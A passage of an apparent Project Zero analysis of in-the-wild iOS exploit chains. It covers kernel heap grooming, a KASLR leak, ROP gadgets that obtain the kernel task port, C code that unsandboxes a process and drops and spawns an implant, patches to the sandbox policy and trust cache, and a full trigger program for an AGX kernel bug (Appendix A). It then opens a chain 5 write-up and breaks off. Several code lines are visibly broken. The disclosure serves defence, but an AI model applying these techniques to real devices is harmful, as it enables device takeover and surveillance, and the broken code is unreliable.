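 * 32-bit value found at byte offset `off` inside that buffer. */
static uint32_t fake_uio_field(size_t off) {
    uint8_t buf[FAKE_UIO_SIZE];
    struct uio_model u;
    uint32_t v;

    memset(&u, 0, sizeof(u));
    u.uio_size  = (int32_t)FAKE_UIO_SIZE;
    u.uio_flags = UIO_FLAGS_WE_ALLOCED;

    memset(buf, 0, sizeof(buf));
    memcpy(buf, &u, sizeof(u));
    memcpy(&v, buf + off, sizeof(v));
    return v;
}
```

With this layout uio_size sits at +0x28 and uio_flags at +0x30, matching the two writes in the exploit's buffer. Every other field is zero, which is why the result is a valid but empty uio whose only meaningful properties are "free me" and "I am 0x190 bytes long".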

They're now in a situation where there are two pointers to the same allocation; both of which they can manipulate:

They then loop through each of the threads which are blocked on the recvmsg_x call and close both ends of the socketpair. This will cause the destruction of all the uios in the recv_msg_elems arrays. If this particular thread was the one which allocated the recv_msg_elems array which got corrupted by the heap overflow, then closing these sockets will cause the uio to be freed. Remember that they've now reallocated this memory to be the backing buffer for an OSData object. Here's uio_free:

void uio_free(uio_t a_uio) {
  if (a_uio != NULL && (a_uio->uio_flags & UIO_FLAGS_WE_ALLOCED) != 0) {
    kfree(a_uio, a_uio->uio_size);
  }
}

This fake uio allocation is pointed to by two pointers at this point; the uio and the OSData. By freeing the uio, they're leaving the OSData object with a dangling backing buffer pointer. It seems that the use of the threads and domain sockets was just a way of creating a heap allocation which had another heap allocation as the first pointer; the freeing of which they could control. It's certainly a novel technique but seems very fragile.
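
The overlay can be illustrated with a small user-space sketch. It only reuses the offsets (0x28, 0x30), the size (0x190) and the flag value given above; the helper names build_fake_uio and model_uio_free_size are hypothetical, and the second one merely mimics the check made by uio_free rather than calling any kernel code.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define FAKE_UIO_SIZE        0x190       /* size of the replacement buffer */
#define UIO_SIZE_OFFSET      0x28        /* uio_size field, per the text */
#define UIO_FLAGS_OFFSET     0x30        /* uio_flags field, per the text */
#define UIO_FLAGS_WE_ALLOCED 0x00000002

/* Hypothetical helper: fill buf with the byte layout of the fake uio. */
static void build_fake_uio(uint8_t buf[FAKE_UIO_SIZE]) {
    uint32_t size = FAKE_UIO_SIZE;
    uint32_t flags = UIO_FLAGS_WE_ALLOCED;
    memset(buf, 0, FAKE_UIO_SIZE);
    memcpy(buf + UIO_SIZE_OFFSET, &size, sizeof(size));
    memcpy(buf + UIO_FLAGS_OFFSET, &flags, sizeof(flags));
}

/* Hypothetical model of the check in uio_free: returns the size that
 * would be handed to kfree, or 0 if the buffer would be left alone. */
static uint32_t model_uio_free_size(const uint8_t *buf) {
    uint32_t size, flags;
    if (buf == NULL) {
        return 0;
    }
    memcpy(&size, buf + UIO_SIZE_OFFSET, sizeof(size));
    memcpy(&flags, buf + UIO_FLAGS_OFFSET, sizeof(flags));
    return (flags & UIO_FLAGS_WE_ALLOCED) ? size : 0;
}
```

A buffer produced by build_fake_uio passes the flag check and reports a size of 0x190, which is why freeing the "uio" releases exactly the OSData backing buffer.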

Immediately after freeing the uio (leaving the OSData object with the dangling pointer) they allocate 2 pages worth of IOSurfaceRootUserClients; hoping that one of them will overlap with the OSData backing buffer (the IOSurfaceRootUserClient will also be allocated from the same kalloc.512 zone.) They then read the contents of all the OSData objects (via IOSurfaceCopyProperty as mentioned earlier) and search for the 32-bit value 0x00020002, which is an OSObject reference count. If it's found then the replacement worked and they now have the contents of the IOSurfaceRootUserClient object inside the OSData backing buffer:

They read the vtable pointer from the IOSurfaceRootUserClient object which they use to determine the KASLR slide by subtracting the unslid value of the vtable pointer (which they get from the offsets dictionary object.)
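
The arithmetic is a single subtraction; a minimal sketch follows. The function names are hypothetical and any addresses passed to them would come from the leak and the offsets dictionary, neither of which is reproduced here.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: the slide is the difference between where the
 * vtable was observed at runtime and where it sits in the unslid image. */
static uint64_t kaslr_slide(uint64_t leaked_vtable, uint64_t unslid_vtable) {
    return leaked_vtable - unslid_vtable;
}

/* Hypothetical helper: rebase any other unslid kernel address. */
static uint64_t slide_address(uint64_t unslid_addr, uint64_t slide) {
    return unslid_addr + slide;
}
```

Once the slide is known, every other static offset (gadgets, kernel_task, allproc) can be rebased the same way.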

They read two fields from the IOSurfaceRootUserClient:

+0xf0 = a pointer to their task struct, set in IOSurfaceRootUserClient::init
+0x118 = pointer to this+0x110; they subtract 0x110 to get the address of the userclient

They make a complete copy of the IOSurfaceRootUserClient and modify two fields. They set the reference count to 0x80008 and they set the pointer at offset +0xe0 to point exactly 0xBC bytes below the kernel_task pointer in the kernel data segment.

The kernel task port

In XNU the kernel is just another task, so like all other tasks it has a task port. A task port is a mach port which, if you have a send right to it, allows complete control over the task. Back in iOS 10 before 10.3, there were no mitigations against using the kernel task port from userspace which made it a very attractive target for exploitation. If you could corrupt memory such that you gained a send right to this port, you got arbitrary kernel memory read and write, by design.

That's what they're going to try to do now.

They free the OSData replacer, and try to reallocate it again (using the key "huge") with the modified IOSurfaceRootUserClient inside more OSData objects.

They then loop through the IOSurfaceRootUserClient connection ports calling external method 13 (get_limits.)

Here's the relevant assembly from the implementation of get_limits. At this point the X0 register is the IOSurfaceRootUserClient, and X2 is an IOExternalMethodArguments*, which contains the arguments to the external method:

LDR     X8, [X2,#0x58] ; struct output buffer
LDR     X9, [X0,#0xE0] ; should be IOSurfaceRoot, now arbitrary
LDUR    X10, [X9,#0xBC]; controlled read at address val+0xBC
STR     X10, [X8]      ; write that value to struct output buffer
...
RET

Since the attackers have replaced the field at +0xE0 with a pointer to 0xBC bytes below the kernel_task pointer in the kernel data segment, the first 8 bytes of the structure output buffer when get_limits is called on the modified user client will contain the address of the kernel task struct!
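
The effect of biasing the pointer by 0xBC can be reproduced in user space. The sketch below treats an ordinary byte array as the fake user client and an ordinary variable as the value to leak; aim_fake_userclient and model_get_limits are hypothetical names, and the model only mirrors the two loads shown in the listing above.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define SURFACE_ROOT_OFFSET 0xE0  /* field read by get_limits, per the listing */
#define LIMITS_READ_OFFSET  0xBC  /* displacement applied before the load */

/* Hypothetical helper: set the +0xE0 field so that field + 0xBC lands
 * exactly on the value we want returned. */
static void aim_fake_userclient(uint8_t *userclient, const void *target) {
    uint64_t field = (uint64_t)(uintptr_t)target - LIMITS_READ_OFFSET;
    memcpy(userclient + SURFACE_ROOT_OFFSET, &field, sizeof(field));
}

/* Hypothetical model of the loads in get_limits. */
static uint64_t model_get_limits(const uint8_t *userclient) {
    uint64_t x9, x10;
    /* LDR X9, [X0,#0xE0] */
    memcpy(&x9, userclient + SURFACE_ROOT_OFFSET, sizeof(x9));
    /* LDUR X10, [X9,#0xBC] */
    memcpy(&x10, (const uint8_t *)(uintptr_t)x9 + LIMITS_READ_OFFSET, sizeof(x10));
    /* STR X10, [X8]: the value ends up in the output buffer */
    return x10;
}
```

Whatever 8 bytes sit at the chosen address come back through the structure output, which is all that is needed to read the kernel_task pointer.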

They verify that those eight bytes do indeed look like a kernel pointer; then prepare for the final replacement. This time they replace 10 fields in the IOSurfaceRootUserClient:

OSData_kaddr is the kernel virtual address of the fake user client object (and the OSData object it's actually inside.)

userclient_copy[0x120] = OSData_kaddr + 0x1F8;
userclient_copy[0x128] = 1;
userclient_copy[0x1F8] = OSData_kaddr + 0x1B0;
userclient_copy[0x1F0] = OSData_kaddr + 0x1A0;
userclient_copy[0x1A0] = OSData_kaddr;
userclient_copy[0x1E8] = kernel_runtime_base + offsets_9;
userclient_copy[0xA8] = kernel_runtime_base + offsets_10;
userclient_copy[0x1E0] = kernel_task + 0x90;
userclient_copy[0x1B8] = our_task_t + 0x2C0;
userclient_copy[0x1C0] = kernel_runtime_base + offsets_11;

offsets 9, 10 and 11 are read from the deserialized NSArchiver.

They use the iosurface property replacement trick for the last time; this time using the key "again". They then call external method 16 (get_surface_use_count) on the dangling IOSurfaceRootUserClient connection.

What's happening here? Let's follow execution flow from the start of the external method itself. At this point X0 will point to their modified IOSurfaceRootUserClient object seen above:

IOSurfaceRootUserClient::get_surface_use_count:
STP   X22, X21, [SP,#-0x10+var_20]!
STP   X20, X19, [SP,#0x20+var_10]
STP   X29, X30, [SP,#0x20+var_s0]
ADD   X29, SP, #0x20
MOV   X20, X2
MOV   X22, X1
MOV   X19, X0
MOV   W21, #0xE00002C2
LDR   X0, [X19,#0xD8]
BL    j__lck_mtx_lock_11
LDR   W8, [X19,#0x128]         ; they set to 1
CMP   W8, W22                  ; w22 == 0?
B.LS  loc_FFFFFFF0064BFD94     ; not taken
LDR   X8, [X19,#0x120]         ; x8 := &this+0x1f8
LDR   X0, [X8,W22,UXTW#3]      ; x0 := &this+0x1b0
CBZ   X0, loc_FFFFFFF0064BFD94 ; not taken
BL    sub_FFFFFFF0064BA758

Execution continues here:

sub_FFFFFFF0064BA758
LDR   X0, [X0,#0x40]           ; X0 := *this+0x1f0 = &this+0x1a0
LDR   X8, [X0]                 ; X8 := this
LDR   X1, [X8,#0x1E8]          ; X1 := kernel_base + offsets_9
BR    X1                       ; jump to offsets_9 gadget

They'll get arbitrary kernel PC control initially at offsets_9; which is the following gadget:

LDR   X2, [X8,#0xA8]           ; X2 := kernel_base + offsets_10
LDR   X1, [X0,#0x40]           ; X1 := *(this+0x1e0)
                               ; The value at that address is a pointer
                               ; to 0x58 bytes below the kernel task port
                               ; pointer inside the kernel task structure
BR    X2                       ; jump to offsets_10 gadget

This loads a new, controlled value into X1 then jumps to the offsets_10 gadget, which is OSSerializer::serialize:

MOV   X8, X1             ; address of pointer to kernel_task_port-0x58
LDP   X1, X3, [X0,#0x18] ; X1 := *(this+0x1b8) == &task->itk_seatbelt
                         ; X3 := *(this+0x1c0) == kbase + offsets_11
LDR   X9, [X0,#0x10]     ; ignored
MOV   X0, X9
MOV   X2, X8             ; address of pointer to kernel_task_port-0x58
BR    X3                 ; jump to offsets_11 gadget

offsets_11 is then a pointer to this gadget:

LDR   X8, [X8,#0x58] ; X8:= kernel_task_port
                     ; that's an arbitrary read
MOV   W0, #0
STR   X8, [X1]       ; task->itk_seatbelt := kernel_task_port
                     ; that's the arbitrary write
RET                  ; all done!

This gadget reads the value at the address stored in X8 plus 0x58, and writes that to the address stored in X1. The previous gadgets gave complete control of those two registers, meaning this gadget is giving them the ability to read a value from an arbitrary address and then write that value to an arbitrary address. The address they chose to read from is a pointer to the kernel task port, and the address they chose to write to points into the current task's special ports array. This read and write has the effect of giving the current task the ability to get a send right to the real kernel task port by calling:

  task_get_special_port(mach_task_self(), TASK_SEATBELT_PORT, &tfp0);
That's exactly what they do next, and that tfp0 mach port is a send right to the real kernel task port, allowing arbitrary kernel memory read/write via task port MIG methods like mach_vm_read and mach_vm_write.

What to do with a kernel task port?

They use the allprocs offset to get the head of the linked list of running processes then iterate through the list looking for two processes by PID:

void PE1_unsandbox() {
  char struct_proc[512] = {0};

  if (offset_allproc)
  {
    uint64_t launchd_ucred = 0;
    uint64_t our_struct_proc = 0;

    uint64_t allproc = kernel_runtime_base + offset_allproc;
    uint64_t proc = kread64(allproc);

    do {
      kread_overwrite(proc, struct_proc, 0x48);

      uint32_t pid = *(uint32_t*)(struct_proc + 0x10);

      if (pid == 1) { // launchd has pid 1
        launchd_ucred = *(_QWORD *)&struct_proc[0x100];
      }

      if ( getpid() == pid ) {
        our_struct_proc = proc;
      }

      if (our_struct_proc && launchd_ucred) {
        break;
      }

      proc = *(uint64_t*)(struct_proc+0x0);
      if (!proc) {
        break;
      }
    } while (proc != allproc && pid);

    // unsandbox themselves
    kwrite64(our_struct_proc + 0x100, launchd_ucred);
  }
}

They're looking for the proc structures for launchd and the current task (which is WebContent, running in the Safari renderer sandbox.) From the proc structure they read the pid as well as the ucred pointer.

As well as containing the POSIX credentials (which define the uid, gid and so on) the ucred also contains a pointer to a MAC label, which is used to define the sandbox which is applied to a process.

Using the kernel memory write they replace the current task's ucred pointer with launchd's. This has the effect of unsandboxing the current process, giving it the same access to the system as launchd.

There are two more hurdles to overcome before they're able to launch their implant: the platform policy and code-signing.

Platform policy

Every process on iOS is restricted by the platform policy sandbox profile; it enforces an extra layer of "system wide" sandboxing. The platform policy bytecode itself lies in the __const region of the sandbox kernel extension and is thus protected by KPP or KTRR. However, the pointer to the platform policy bytecode resides in a structure allocated via IOMalloc, and is thus in writable memory. The attackers make a complete copy of the platform policy bytecode and replace the pointer in the heap-allocated structure with a pointer to the copy. In the copy they patch out the process-exec and process-exec-interpreter hooks; here's a diff of the decompiled policies (generated with sandblaster):

    (require-not (global-name ""))
    (require-not (global-name ""))
    (require-not (global-name ""))))
-   (deny process-exec*
-    (require-all
-     (require-all (require-not (subpath "/private/var/run/"))
-      (require-not (literal "/private/var/factory_mount/"))
-      (require-not (subpath "/private/var/containers/Bundle"))
-      (require-not (literal "/private/var/personalized_automation/"))
-      (require-not (literal "/private/var/personalized_factory/"))
-      (require-not (literal "/private/var/personalized_demo/"))
-      (require-not (literal "/private/var/personalized_debug/"))
-      (require-not (literal "/Developer/")))
-     (subpath "/private/var")
-     (require-not (debug-mode))))
-   (deny process-exec-interpreter
-    (require-all
-     (require-not (debug-mode))
-     (require-all (require-not (literal "/bin/sh"))
-      (require-not (literal "/bin/bash"))
-      (require-not (literal "/usr/bin/perl"))
-      (require-not (literal "/usr/local/bin/scripter"))
-      (require-not (literal "/usr/local/bin/luatrace"))
-      (require-not (literal "/usr/sbin/dtrace")))))
    (deny system-kext-query
     (require-not (require-entitlement "")))
    (deny system-privilege

As the platform policy changes over time their platform policy bytecode patches become more elaborate but the fundamental idea remains the same.

Code signing bypass

Jailbreaks typically bypass iOS's mandatory code signing by making changes to amfid (Apple Mobile File Integrity Daemon) which is a userspace daemon responsible for verifying code signatures. An example of an early form of such a change was to modify the amfid GOT such that a function which was called to verify a signature (MISValidateSignature) was replaced with a call to a function which always returned 0; thereby allowing all signatures, even those which were invalid.

There's another approach though, which has been used increasingly by recent jailbreaks. The kernel also contains an array of known-trusted hashes. These are hashes of code-signature blobs (also known as CDHashes) which are to be implicitly trusted. This design makes sense because those hashes will be part of the kernel's code signature; thus still tied to Apple's root-of-trust.

The weakness, given an attacker with kernel memory read/write, is that this trust cache data structure is mutable. There are occasions when more hashes will be added to it at runtime. It's modified, for example, when the DeveloperDiskImage.dmg is mounted on an iPhone if you do app development. During app development native tools like lldb-server which run on the device have their code-signature blob hashes added to the trust cache.
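
Why mutability matters can be shown with a toy model. The structure below is purely illustrative and is not XNU's real trust cache layout; the only detail taken from the real system is that a CDHash is 20 bytes long. All toy_* names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CDHASH_LEN          20   /* CDHashes are 20 bytes long */
#define MAX_DYNAMIC_ENTRIES 16   /* arbitrary capacity for this toy */

/* Toy stand-in for a runtime-extensible trust cache. */
struct toy_trust_cache {
    size_t  count;
    uint8_t hashes[MAX_DYNAMIC_ENTRIES][CDHASH_LEN];
};

/* Lookup as a signature check might perform it: trusted if present. */
static bool toy_cache_contains(const struct toy_trust_cache *tc,
                               const uint8_t *hash) {
    for (size_t i = 0; i < tc->count; i++) {
        if (memcmp(tc->hashes[i], hash, CDHASH_LEN) == 0) {
            return true;
        }
    }
    return false;
}

/* Anyone able to write to the cache can append a hash of their choosing. */
static bool toy_cache_add(struct toy_trust_cache *tc, const uint8_t *hash) {
    if (toy_cache_contains(tc, hash)) {
        return true;
    }
    if (tc->count == MAX_DYNAMIC_ENTRIES) {
        return false;
    }
    memcpy(tc->hashes[tc->count++], hash, CDHASH_LEN);
    return true;
}
```

In the toy, a single append is enough for a previously unknown hash to be treated as trusted; nothing else about the system has to change.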

Since the attackers only wish to execute their implant binary and not disable code-signing system wide, it suffices to simply add the hash of their implant's code-signing blob to the kernel dynamic trust cache, which they do using the kernel task port.

Launching implant

The final stage is to drop and spawn the implant binary. They do this by writing the implant Mach-O to disk under /tmp, then calling posix_spawn to execute it:

  FILE* f = fopen("/tmp/updateserver", "w+");
  if (f) {
    fwrite(buf, 1, buf_size, f);
    fclose(f);
    chmod("/tmp/updateserver", 0755);
    pid_t pid = 0;
    char* argv[] = {"/tmp/updateserver", NULL};
    posix_spawn(&pid,
                "/tmp/updateserver",
                NULL,
                NULL,
                argv,
                environ);
  }

This immediately starts the implant running as root. The implant will remain running until the device is rebooted, communicating every 60 seconds with a command-and-control server asking for instructions for what information to steal from the device. We'll cover the complete functionality of the implant in a later post.

Appendix A

Trigger for variant

By undefining IS_12_B1 you will get the initial trigger.

The create_shmem selector changed from 6 to 5 in iOS 11. The unpatched variant was still present in iOS 12 beta 1 but no longer reproduces in 12.1.1. It does reproduce on at least 11.1.2, 11.3.1 and 11.4.1.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>

#include <mach/mach.h>
#include <CoreFoundation/CoreFoundation.h>

#include "command_buffers.h"

typedef mach_port_t task_port_t;
typedef mach_port_t io_service_t;
typedef mach_port_t io_connect_t;

extern
const mach_port_t kIOMasterPortDefault;

kern_return_t
IOServiceOpen(
  io_service_t    service,
  task_port_t     owningTask,
  uint32_t        type,
  io_connect_t  * connect );

CFMutableDictionaryRef
IOServiceMatching(
  const char *    name ) CF_RETURNS_RETAINED;

io_service_t
IOServiceGetMatchingService(
  mach_port_t     masterPort,
  CFDictionaryRef matching CF_RELEASES_ARGUMENT);

kern_return_t
IOConnectCallMethod(
  mach_port_t      connection,       // In
  uint32_t         selector,         // In
  const uint64_t  *input,            // In
  uint32_t         inputCnt,         // In
  const void      *inputStruct,      // In
  size_t           inputStructCnt,   // In
  uint64_t        *output,           // Out
  uint32_t        *outputCnt,        // In/Out
  void            *outputStruct,     // Out
  size_t          *outputStructCnt); // In/Out

kern_return_t
IOConnectCallAsyncMethod(
  mach_port_t      connection,       // In
  uint32_t         selector,         // In
  mach_port_t      wake_port,        // In
  uint64_t        *reference,        // In
  uint32_t         referenceCnt,     // In
  const uint64_t  *input,            // In
  uint32_t         inputCnt,         // In
  const void      *inputStruct,      // In
  size_t           inputStructCnt,   // In
  uint64_t        *output,           // Out
  uint32_t        *outputCnt,        // In/Out
  void            *outputStruct,     // Out
  size_t          *outputStructCnt); // In/Out

typedef struct IONotificationPort * IONotificationPortRef;

IONotificationPortRef
IONotificationPortCreate(
  mach_port_t             masterPort );

mach_port_t
IONotificationPortGetMachPort(
  IONotificationPortRef   notify );

kern_return_t
IOConnectAddClient(
  io_connect_t    connect,
  io_connect_t    client );

#define IS_12_B1 1

#ifdef IS_12_B1
#define AGX_SHARED_CREATE_SHMEM 5
#else
#define AGX_SHARED_CREATE_SHMEM 6
#endif

struct agx_shared_create_shmem_struct_out {
  void* base;
  uint32_t size;
  uint32_t id;
};

struct submit_command_buffers_struct_input {
  uint32_t field_0;
  uint32_t field_1;
  uint32_t resource_id_0;
  uint32_t resource_id_1;
  uint64_t field_4;
  uint64_t field_5;
};

struct async_reference {
  mach_port_t port;
  void(*fptr)(void);
  uint64_t something;
};

void null_sub(void) {return;};

void* IOSurfaceCreate(void*);
uint32_t IOSurfaceGetID(void*);

uint32_t allocate_global_iosurface_and_return_id() {
  CFMutableDictionaryRef dict = CFDictionaryCreateMutable(NULL, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
  int alloc_size_raw_value = 1024;
  CFNumberRef alloc_size_cfnum = CFNumberCreate(NULL, kCFNumberSInt32Type, &alloc_size_raw_value);

  CFDictionarySetValue(dict, CFSTR("IOSurfaceAllocSize"), alloc_size_cfnum);
  CFDictionarySetValue(dict, CFSTR("IOSurfaceIsGlobal"), kCFBooleanTrue);

  int pixel_format_raw_value = 0;
  CFNumberRef pixel_format_cfnum = CFNumberCreate(NULL, kCFNumberSInt32Type, &pixel_format_raw_value);
  CFDictionarySetValue(dict, CFSTR("IOSurfacePixelFormat"), pixel_format_cfnum);

  void* iosurface = IOSurfaceCreate(dict);
  if (iosurface == NULL) {
    printf("failed to create IOSurface\n");
    return 0;
  }
  printf("allocated IOSurface: %p\n", iosurface);

  uint32_t id = IOSurfaceGetID(iosurface);
  printf("id: 0x%x\n", id);
  return id;
}

void* racer_thread(void* arg) {
  volatile uint32_t* ptr = arg;
  uint32_t orig = *ptr;
  printf("racing, original value: %d\n", orig);
  while (1) {
    *ptr = 0x40;
    *ptr = orig;
  }
  return NULL;
}

void do_it(void) {
  kern_return_t err;

  io_service_t agx_service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOGraphicsAccelerator2"));
  if (agx_service == MACH_PORT_NULL) {
    printf("failed to get service port\n");
    return;
  }
  printf("got service: %x\n", agx_service);

  io_connect_t shared_user_client_conn = MACH_PORT_NULL;

  err = IOServiceOpen(agx_service, mach_task_self(), 2, &shared_user_client_conn);
  if (err != KERN_SUCCESS) {
    printf("open of type 2 failed\n");
    return;
  }
  printf("got connection: 0x%x\n", shared_user_client_conn);

  // allocate two shmem's:
  uint64_t shmem_size = 0x1000;
  struct agx_shared_create_shmem_struct_out shmem0_desc = {0};
  size_t shmem_result_size = sizeof(shmem0_desc);
  err = IOConnectCallMethod(shared_user_client_conn, AGX_SHARED_CREATE_SHMEM, &shmem_size, 1, NULL, 0, NULL, NULL, &shmem0_desc, &shmem_result_size);
  if (err != KERN_SUCCESS) {
    printf("external method create_shmem failed: 0x%x\n", err);
    return;
  }
  printf("create shmem success!\n");
  printf("base: %p size: 0x%x id: 0x%x\n", shmem0_desc.base, shmem0_desc.size,;

  memset(shmem0_desc.base, 0, shmem0_desc.size);

  shmem_size = 0x1000;
  struct agx_shared_create_shmem_struct_out shmem1_desc = {0};
  err = IOConnectCallMethod(shared_user_client_conn, AGX_SHARED_CREATE_SHMEM, &shmem_size, 1, NULL, 0, NULL, NULL, &shmem1_desc, &shmem_result_size);
  if (err != KERN_SUCCESS) {
    printf("external method create_shmem failed: 0x%x\n", err);
    return;
  }
  printf("create shmem success!\n");
  printf("base: %p size: 0x%x id: 0x%x\n", shmem1_desc.base, shmem1_desc.size,;

  IONotificationPortRef notification_port_ref = IONotificationPortCreate(kIOMasterPortDefault);
  mach_port_t notification_port_mach_port = IONotificationPortGetMachPort(notification_port_ref);

  io_connect_t agx_command_queue_userclient = MACH_PORT_NULL;
  err = IOServiceOpen(agx_service, mach_task_self(), 5, &agx_command_queue_userclient);
  if (err != KERN_SUCCESS) {
    printf("failed to open type 5\n");
    return;
  }
  printf("got agx command queue user client: 0x%x\n", agx_command_queue_userclient);

  err = IOConnectAddClient(agx_command_queue_userclient, shared_user_client_conn);
  if (err != KERN_SUCCESS) {
    printf("failed to connect command queue and shared user client: 0x%x\n", err);
    return;
  }
  printf("connected command queue\n");

  struct async_reference async_ref = {0};
  async_ref.port = notification_port_mach_port;
  async_ref.fptr = null_sub;

  err = IOConnectCallAsyncMethod(agx_command_queue_userclient, 0, notification_port_mach_port, (uint64_t*)&async_ref, 1, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL);
  if (err != KERN_SUCCESS) {
    printf("failed to call async selector 0\n");
    return ;
  }

  printf("called async selector 0\n");

  for (int loop = 0; loop < 20; loop++) {
    uint32_t global_surface_id = allocate_global_iosurface_and_return_id();

    // create a resource with that:
    uint8_t* input_buf = calloc(1, 1024);
    *((uint32_t*)(input_buf+0)) = 0x82;
    *((uint32_t*)(input_buf+0x18)) = 1;
    *((uint32_t*)(input_buf+0x30)) = global_surface_id;

    uint8_t* output_buf = calloc(1, 1024);
    size_t output_buffer_size = 1024;

    err = IOConnectCallMethod(shared_user_client_conn, 0, NULL, 0, input_buf, 1024, NULL, 0, output_buf, &output_buffer_size);
    if (err != KERN_SUCCESS) {
      printf("new_resource failed: 0x%x\n", err);
      return;
    }
    printf("new_resource success!\n");

    // try to build the command buffer structure:
#ifdef IS_12_B1
    int target_size = 0x200;
#else
    int target_size = 0x800;
#endif
    int n_entries = target_size / 0x30;

    uint8_t* cmd_buf = (uint8_t*)shmem1_desc.base;

    *((uint32_t*)(cmd_buf+0x8)) = 1;
    *((uint32_t*)(cmd_buf+0x24)) = n_entries; // n_entries??

#ifdef IS_12_B1
    if (loop == 0) {
      pthread_t th;
      pthread_create(&th, NULL, racer_thread, (cmd_buf+0x24));
      usleep(50*1024);
    }
#endif

    int something = (target_size+8) % 0x30 / 8;

#ifdef IS_12_B1
    for (int i = 0; i < n_entries+20; i++) {
#else
    for (int i = 0; i < n_entries; i++) {
#endif
      uint8_t* base = cmd_buf + 0x28 + (i*0x40);
      for (int j = 0; j < 7; j++) {
        *((uint32_t*)(base+(j*4))) = 3; // resource_id?
        *((uint16_t*)(base+(0x30)+(j*2))) = 1;
      }
      if (i > something) {
        *((uint16_t*)(base+0x3e)) = 6;
      } else {
#ifdef IS_12_B1
        // this is not the overflow we're targeting here
        *((uint16_t*)(base+0x3e)) = 6;
#else
        *((uint16_t*)(base+0x3e)) = 7;
#endif
      }
    }

    struct submit_command_buffers_struct_input cmd_in = {0};
    cmd_in.field_1 = 1;
    cmd_in.resource_id_0 =; // 1
    cmd_in.resource_id_1 =; // 2

    // s_submit_command_buffers:
    err = IOConnectCallMethod(agx_command_queue_userclient, 1, NULL, 0, &cmd_in, sizeof(cmd_in), NULL, NULL, NULL, NULL);

    printf("s_submit_command_buffers returned: %x\n", err);

    // delete_resource:
    uint64_t three = 3;
    err = IOConnectCallMethod(shared_user_client_conn, 1, &three, 1, NULL, 0, NULL, NULL, NULL, NULL);
    printf("delete_resource returned: %x\n", err);

    //
  }
}

In-the-wild iOS Exploit Chain 5

30 August, 2019 - 02:04
Posted by Ian Beer, Project Zero


This exploit chain is a three way collision between this attacker group, Brandon Azad from Project Zero, and @S0rryMybad from 360 security.

On November 17th 2018, @S0rryMybad used this vulnerability to win $200,000 USD at the TianFu Cup PWN competition. Brandon Azad independently discovered and reported the same issue to Apple on December 6th, 2018. Apple patched this issue on January 22, 2019, with both @S0rryMybad and Brandon credited in the release notes for iOS 12.1.3 (CVE-2019-6225). It even won a Pwnie at Black Hat 2019 for best privilege escalation bug!

So, why did the attackers, who already possessed then-functioning iOS Exploit Chain 4 (that contained the 0-days reported to Apple in February 2019), leave that chain and move to this brand new exploit chain? Probably because it was far more reliable, used only one vulnerability rather than the collection of vulnerabilities, and avoided the pitfalls inherent in the thread-based reallocation technique used for the sandbox escape in iOS Exploit Chain 4. 

The more important takeaway, however, is what the vulnerability was. In 2014, Apple added an unfinished implementation of a new feature named “vouchers” and part of this new code was a new syscall (technically, a task port MIG method) which, from what I can tell, never worked. To be clear, if there had been a test which called the syscall with the expected arguments, it would have caused a kernel panic. If any Apple developer had attempted to use this feature during those four years, their phone would have immediately crashed.

In this detailed writeup, we'll look at exactly how the attackers exploited this issue to install their malicious implant and monitor user activity on the devices. My next writeup is on the implant itself, including command and control and a demonstration of its surveillance capabilities.

In-the-wild iOS Exploit Chain 5 - task_swap_mach_voucher

targets: 5s through X, 11.4.1 through 12.1.2
first unsupported version 12.1.3 - 22 Jan 2019

iPhone6,1 (5s, N51AP)
iPhone6,2 (5s, N53AP)
iPhone7,1 (6 plus, N56AP)
iPhone7,2 (6, N61AP)
iPhone8,1 (6s, N71AP)
iPhone8,2 (6s plus, N66AP)
iPhone8,4 (SE, N69AP)
iPhone9,1 (7, D10AP)
iPhone9,2 (7 plus, D11AP)
iPhone9,3 (7, D101AP)
iPhone9,4 (7 plus, D111AP)
iPhone10,1 (8, D20AP)
iPhone10,2 (8 plus, D21AP)
iPhone10,3 (X, D22AP)
iPhone10,4 (8, D201AP)
iPhone10,5 (8 plus, D211AP)
iPhone10,6 (X, D221AP)

15G77 (11.4.1 - 9 Jul 2018)
16A366 (12.0 - 17 Sep 2018)
16A404 (12.0.1 - 8 Oct 2018)
16B92 (12.1 - 30 Oct 2018)
16C50 (12.1.1 - 5 Dec 2018)
16C10 (12.1.2 - 17 Dec 2018)

Vouchers

Vouchers were a feature introduced with iOS 8 in 2014. The vouchers code seems to have landed without being fully implemented, indicated by the comment above the vulnerable code:

/* Placeholders for the task set/get voucher interfaces */
kern_return_t
task_get_mach_voucher(
  task_t                  task,
  mach_voucher_selector_t __unused which,
  ipc_voucher_t*          voucher)
{
  if (TASK_NULL == task)
    return KERN_INVALID_TASK;

  *voucher = NULL;
  return KERN_SUCCESS;
}

kern_return_t
task_set_mach_voucher(
  task_t                 task,
  ipc_voucher_t __unused voucher)
{
  if (TASK_NULL == task)
    return KERN_INVALID_TASK;

  return KERN_SUCCESS;
}

kern_return_t
task_swap_mach_voucher(
  task_t         task,
  ipc_voucher_t  new_voucher,
  ipc_voucher_t* in_out_old_voucher)
{
  if (TASK_NULL == task)
    return KERN_INVALID_TASK;

  *in_out_old_voucher = new_voucher;
  return KERN_SUCCESS;
}

You're not alone if you can't immediately spot the bug in the above snippet; it remained in the codebase and on all iPhones since 2014, reachable from the inside of any sandbox. You would have triggered it though if you had ever tried to use this code and called task_swap_mach_voucher with a valid voucher. Within those four years, it’s almost certain that no code was ever written to actually use the task_swap_mach_voucher feature, despite it being reachable from every sandbox.

It was likely never called once, not during development, testing, QA or production (because otherwise it would have caused an immediate kernel panic and forced a reboot). I can only assume that it slipped through code review, testing and QA. task_swap_mach_voucher is a kernel MIG method on a task port; it also cannot be disabled by the iOS sandbox, further compounding this error.

To see why there's actually a bug here, we need to look one level deeper at the MIG auto-generated code which calls task_swap_mach_voucher:

Here are the relevant MIG definitions for task_swap_mach_voucher:

routine task_swap_mach_voucher(
                               task        : task_t;
                               new_voucher : ipc_voucher_t;
                         inout old_voucher : ipc_voucher_t);

/* IPC voucher internal object */
type ipc_voucher_t = mach_port_t
     intran: ipc_voucher_t convert_port_to_voucher(mach_port_t)
